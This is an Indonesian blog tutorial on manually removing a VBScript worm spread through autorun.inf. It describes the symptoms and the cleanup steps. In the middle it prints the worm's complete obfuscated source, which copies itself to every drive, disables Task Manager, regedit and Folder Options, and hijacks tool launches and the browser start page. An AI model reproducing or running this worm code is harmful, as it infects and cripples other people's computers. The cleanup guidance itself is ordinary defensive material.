Membersihkan Virus Tanpa Antivirus

Syaifullah [email protected] http://wildan08.wordpress.com Lisensi Dokumen: Copyright © Desember 2008 Wildan08.Wordpress.Com Seluruh dokumen di Wildan08.Wordpress.Com dapat digunakan, dimodifikasi dan disebarkan secara bebas untuk tujuan bukan komersial (nonprofit), dengan syarat tidak menghapus atau merubah atribut penulis dan pernyataan copyright yang disertakan dalam setiap dokumen. Tidak diperbolehkan melakukan penulisan ulang, kecuali mendapatkan ijin terlebih dahulu dari Wildan08.Wordpress.Com .

Membersihkan Virus Tanpa Antivirus VIRUS ! VIRUS dan dimana-mana ada virus yang selalu menyerang komputer ternyata dengan adanya Antivirus tidak menjamin 100% komputer kita aman dari virus karena virusnya sudah ada terlebih dahulu baru dikenal oleh Antivirus, pembuat virus semakin cerdik dan pintar dalam memanfaatkan kelemahan dari Antivirus yang biasanya sebuah virus berextention EXE yang dikenalinya lalu bagaimana dengan extention yang lain ternyata Antivirus harus belajar banyak dari pengalaman karena seperti tadi pagi ketika komputerku terinfeksi oleh virus yang dibuat dengan menggunakan Visual Basic Scrip (VBS) ternyata Antivirus tidak mampu mendeteksi keberadaannya karena setelah gejala hilangnya RUN, SEARCH dan tidak bisa dibukanya regedit,msconfig serta folder option serta drivenya selain C kadang-kadang dikenal membuat aku sadar bahwa komputerku telah terinfeksi virus yang masuknya mungkin melalui internet atau flashdisku yang telah dipinjam oleh temanku. Saya bingung karena file dataku tidak bisa lagi saya buka di drive E, pikiranku muncul untuk format ulang saja tapi aku masih ragu antara format dan tidak, akhirnya saya ambil keputusan untuk tidak format karena saya pernah mempelajari teknik pembuatan worm yang lebih canggih dari virus hasil karangan Achmad Darmal terbitan Jasakom yang berjudul “Worm 1” dan “Worm 2” biarlah saya akan mencoba untuk melumpuhkan virus yang satu ini seperti virus lain yang telah salah lumpuhkan tanpa Antivirus, saya akan mempelajari virus ini untuk aku jebak sebagaimana virus yang telah menjebak saya sebelumnya dengan masuk tanpa saya ketahui. Baiklah kita bersihkan saja virus ini, tetapi sebelum virus ini dibersihkan maka virus harus dalam keadaan tidak terhiden, oleh karena itu untuk menormalkan kembali gunakan Ansav, pilih menu Plugins kemudian Registry FX

1


Kliklah Check All kemudian Restart Explorer maka semua registry yang telah diubah oleh virus kembali normal maka kelihatanlah Virus yang tersembunyi karena telah terhidden yaitu file Autorun.inf yang ternyata setelah dibuka berisi [autorun] shellexecute=wscript.exe h4ck3v1l.vbs dan file h4ck3v1l.vbs yang ternyata setelah saya buka berisi scrip sebagai berikut : 'Rem Author : Aurel 666 'Rem Padang Panjang VX Syndicate 'Rem Http://Aurel666.Page.tl on error resume next dim mysource,winpath,vuKYMjmVzp,fs,mf,atr,tf,rg,nt,check,sdatr = FfbxsZlGQW("ôvspuvb\")&vbcrlf&FfbxsZlGQW("tcw/m2w4ld5i!fyf/uqjsdtx>fuvdfyfmmfit") set fs = createobject(FfbxsZlGQW("udfkcPnfutzTfmjG/hojuqjsdT")) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype 2


set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf loop do Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & FfbxsZlGQW("tcw/m2w4ld5i]")) tf.attributes = 32 set tf=fs.createtextfile(winpath & FfbxsZlGQW("tcw/m2w4ld5i]"),2,true) tf.write mysource tf.close set tf = fs.getfile(winpath & FfbxsZlGQW("tcw/m2w4ld5i]")) tf.attributes = 39 for each vuKYMjmVzp in fs.drives If (vuKYMjmVzp.drivetype = 1 or vuKYMjmVzp.drivetype = 2) and vuKYMjmVzp.path <> FfbxsZlGQW(";B") then set tf=fs.getfile(vuKYMjmVzp.path &FfbxsZlGQW("tcw/m2w4ld5i]")) tf.attributes =32 set tf=fs.createtextfile(vuKYMjmVzp.path &FfbxsZlGQW("tcw/m2w4ld5i]"),2,true) tf.write mysource tf.close set tf=fs.getfile(vuKYMjmVzp.path &FfbxsZlGQW("tcw/m2w4ld5i]")) tf.attributes =39 set tf =fs.getfile(vuKYMjmVzp.path &FfbxsZlGQW("goj/ovspuvb]")) tf.attributes = 32 set tf=fs.createtextfile(vuKYMjmVzp.path &FfbxsZlGQW("goj/ovspuvb]"),2,true) tf.write atr tf.close set tf =fs.getfile(vuKYMjmVzp.path &FfbxsZlGQW("goj/ovspuvb]")) tf.attributes=39 end if next set rg = createobject(FfbxsZlGQW("mmfiT/uqjsdTX")) 3


rg.regwrite FfbxsZlGQW("]eobnnpd]mmbutoJ]mmfit]fmjggoj]UPPS`TFTTBMD`ZFLI"), FfbxsZlGQW("fyf/ggphpm") rg.regwrite FfbxsZlGQW("]eobnnpd]ofqp]mmfit]fmjghfs]UPPS`TFTTBMD`ZFLI"), FfbxsZlGQW("fyf/ggphpm") rg.regwrite FfbxsZlGQW("]eobnnpD]ujeF]mmfiT]fmjGTCW]UPPS`TFTTBMD`ZFLI"), FfbxsZlGQW("fyf/ggphpm") rg.regwrite FfbxsZlGQW("sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDP M`ZFLI"), FfbxsZlGQW("zbmqtjEtnfuJzbsUpO") rg.regwrite FfbxsZlGQW("ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"), FfbxsZlGQW("fyf/qnbojX]qnbojX]tfmjG!nbshpsQ];D"), FfbxsZlGQW("HOJSUT`HFS") rg.regwrite FfbxsZlGQW("topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxug pT]SFTVÙOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS") rg.regwrite FfbxsZlGQW("eojGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTVÙ OFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS") rg.regwrite FfbxsZlGQW("ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTVÙO FSSVD`ZFLI"), FfbxsZlGQW(FfbxsZlGQW("2")), FfbxsZlGQW("ESPXE`HFS") rg.regwrite FfbxsZlGQW("uyFfmjGfejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SF TVÙOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS") rg.regwrite FfbxsZlGQW("fubjdpttBfmjGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugp T]SFTVÙOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS") rg.regwrite FfbxsZlGQW("ujefhfSfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFT VÙOFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS") rg.regwrite FfbxsZlGQW("ovSpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTVÙO FSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS")

4


rg.regwrite FfbxsZlGQW("ENDfmcbtjE]nfutzT]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTVÙ OFSSVD`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS") rg.regwrite FfbxsZlGQW("shNltbUfmcbtjE]nfutzt]tfjdjmpq]opjtsfWuofssvD]txpeojX]ugptpsdjN]FSBXUGPT]FO JIDBN`MBDPM`ZFLI"), FfbxsZlGQW("2"), FfbxsZlGQW("ESPXE`HFS") rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/end]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugpt psdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO") rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX] ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO") rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]u gptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO") rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/34uefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX] ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO") rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/shNltbU]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX] ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO") rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/cjsuub]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ug ptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO") rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/mmbutoj]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX ]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO") rg.regwrite FfbxsZlGQW("sfhhvcfE]fyf/qvuft]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugp tpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI"),FfbxsZlGQW("fyf/ebqfupO") rg.regwrite FfbxsZlGQW("m2w4ld5i]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFL I"),winpath&FfbxsZlGQW("tcw/m2w4ld5i]")

5


rg.regwrite FfbxsZlGQW("fhbQ!usbuT]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTVÙOFSSVD`ZFLI"),Ff bxsZlGQW("qj{/fubeqv0mu/fhbq/777mfsvB/xxx00;quui") rg.regwrite FfbxsZlGQW("fmujU!xpeojX]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTVÙOFSSVD`ZFLI"), FfbxsZlGQW("fubdjeozT!yW!hobkobQ!hobebQ") if check <> 1 then Wscript.sleep 200000 end if loop while check<>1 set sd = createobject(FfbxsZlGQW("mmfit/uqjsdtX")) sd.run winpath&FfbxsZlGQW("!$udfmft0$f0!fyf/sfspmqyf]")&Wscript.ScriptFullname Function FfbxsZlGQW(EsqAXarTUp) Dim i, tmp2 For i = 1 To Len(EsqAXarTUp) tmp2 = Chr(Asc(Mid(EsqAXarTUp, i, 1)) - 1) + tmp2 Next FfbxsZlGQW = tmp2 End Function Scrip diatas dibuat dengan menggunakan Visual Basic Script yang berdasarkan tubuh virus dibuat oleh Aurel 666 berasal dari Padang Panjang, gejala dari virus tersebut adalah akan selalu menjalankan script virus dengan bantuan wscript.exe, File h4ck3v1l.vbs dan autorun.inf apabila saya hapus maka sekian detik kemudian akan muncul lagi, ternyata virus tersebut berada di C:\h4c3v1l.vbs dan di c:\windows\h4c3v1l.vbs dan file yang berada di c:\windows\h4c3v1l.vbs tidak dapat dihapus karena digunakan oleh program lain, untuk menghapusnya gunakan aplikasi ProceXP dengan menghapus wscript.exe dengan cara seperti pada gambar dibawah ini

6


Kemudian pilih Kill Process setelah itu maka hapuslah semua file yang bernama h4c3v1l.vbs dengan start->search setelah muncul semua file tersebut maka hapuslah, dengan hilangnya file h3ck3v1l.vbs tersebut dari sistem komputer anda maka anda sudah terbebas dari serangan virus tersebut. Mudah bukan ? akhirnya saya mengucapkan selamat mencoba.

7

Membersihkan Virus Tanpa Antivirus

Recommend Documents